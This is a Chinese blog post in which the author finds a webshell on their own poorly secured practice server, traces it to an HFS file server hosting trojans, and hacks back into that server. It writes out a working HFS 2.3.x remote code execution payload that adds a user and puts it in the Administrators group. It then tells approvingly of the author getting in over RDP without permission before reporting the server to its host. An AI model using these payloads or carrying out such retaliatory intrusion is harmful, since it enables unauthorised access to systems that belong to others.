
文章插图
我与该学员的聊天截图

文章插图
脚本黑客的服务器桌面截图

文章插图
如何渗透进去的呢

文章插图
科普HFS
先来科普一下:
HFS是什么?
HFS网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统
如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键
【自己的服务器被黑客抓鸡-看我如何反击】
即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人HTTP网络文件服务器 。
事情原因
今天我发现我自己练习用的服务器被别人挂了一句话木马
(我没有修改phpstudy的MySQL数据库默认密码),一定要注意弱口令和及时更改默认密码
如图打开主页成这样的了都是些数据库的日志应该是被黑客给搞了
(太可怕了),怪自己太疏忽 。

文章插图
我在里面发现了一些奇怪的下载连接,判断了下,应该是下载木马的连接

文章插图

文章插图
然后我通过浏览器访问了下该地址,发现是一个HFS的程序

文章插图

文章插图

文章插图

文章插图

文章插图

文章插图

文章插图

文章插图
然后发现上面全是木马exe,可能是脚本小子用来抓肉鸡用的
我记得没错的话 。
HFS2.3.X有个远程代码执行的漏洞
Payload:
http://127.0.0.1/?search==%00{.exec|cmd /c net user DEF DEFHACKER123 /add.} http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators DEF /add.} 反击
HFS2.3.X代码执行的利用工具,我从网上下载了一个

文章插图
成功执行了命令,添加了一个用户

文章插图
然后我直接3389上去看了下

文章插图

文章插图
后续
这台服务器的归属运营商,我向客服说明了情况,希望他们处理下该问题

文章插图
下面是我与网站客服的聊天截图

文章插图

文章插图

文章插图

文章插图
最后,希望大家不要利用技术来做非法的事情
推荐阅读
- 淘宝店铺可以上架多少宝贝 淘宝店铺被限制上架商品怎么办
- 服务器又崩溃了?看看专业的程序员怎么解决
- 网店降权是什么意思 店铺被降权了怎么办?
- 容易被忽视的家居风水 家中色彩过多易生矛盾
- 淘宝店铺图片被盗用怎么办 自己照片被淘宝商家盗用图片在哪里投诉
- 淘宝账户冻结怎么解 淘宝账户被冻结怎么申请解封
- 4招教你找到自己的穿衣风格
- 小鹏汽车|买车争议只能去广州仲裁!小鹏汽车被监管“锤了”
- 一举夺下鹰堡是什么梗 笋都被你夺完了啥梗什么意思
- 抖音限流是怎么回事? 抖音限流是什么意思?抖音被限流了怎么办?
